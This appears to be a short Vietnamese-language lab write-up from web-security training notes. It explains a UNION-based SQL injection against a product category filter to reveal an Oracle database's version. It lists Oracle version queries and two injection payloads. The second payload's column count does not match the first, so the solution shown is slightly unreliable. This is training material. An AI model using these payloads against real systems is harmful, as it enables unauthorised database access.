Lab: SQL injection attack, querying the database type and version on Oracle
Mô tả
Phòng thí nghiệm này chứa lỗ hổng SQL injection trong bộ lọc danh mục sản phẩm. Bạn có thể sử dụng tấn công UNION để lấy kết quả từ truy vấn được tiêm.
Mục tiêu: Hiển thị chuỗi phiên bản cơ sở dữ liệu
Phân tích
Oracle
SELECT banner FROM v$version
SELECT version FROM v$instance
Giải pháp
' UNION SELECT NULL,NULL FROM v$version--
' UNION SELECT banner FROM v$version--
PreviousExamining the databaseNextLab: SQL injection attack, querying the database type and version on MySQL and Microsoft
Last updated